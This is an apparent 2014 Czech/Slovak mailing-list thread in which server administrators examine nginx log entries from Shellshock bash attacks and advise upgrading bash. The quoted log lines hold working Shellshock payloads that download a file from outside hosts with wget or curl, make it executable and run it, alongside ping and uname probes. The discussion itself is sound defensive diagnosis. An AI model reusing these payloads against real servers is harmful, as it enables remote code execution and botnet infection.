29 Sep
2014
29 Sep
'14
8:33 a.m.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Tak jsem to zkoumal a toto je celkem bezpecne, je to zda se pouze
test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
Upgraduj hlavne ten bash :)
Medved
Dne 29.9.2014 v 10:23 René Klačan napsal(a):
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;};
/bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a
possible fraud attempt from "74.201.85.69" claiming to be*
*MailScanner warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - -
[25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; };
ping -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
+0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 200 193 "-" "() {
:;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34
+0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c
\x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - -
[27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200
193 "-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut
len podozrive procesy? a pohladat nejake stopy po tom, ci sa
nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik(a)mimik.sk
<mailto:mimik@mimik.sk>>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz
<mailto:janbivoj.kolar@zazen-nudu.cz>> wrote:
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpGVkACgkQ5JdzTS3AJTYOuwEAnjjWwm6jT3Fugx1nQTYcEYAu
GDKe6MNXS+DNM3Cqb9kA/38Dj1l2S3mqgL1Zm9I1hVkAH26yqhapUyZxqShtspgt
=JEDU
-----END PGP SIGNATURE-----
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
byl úspěšný či
nikoliv?
Honza
On 29.9.2014 10 <tel:29.9.2014%2010>:02, Petr Krcmar wrote:
> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
>> Hele,
>>
>> z jineho stroje:
> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
> rootkit:
>
> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/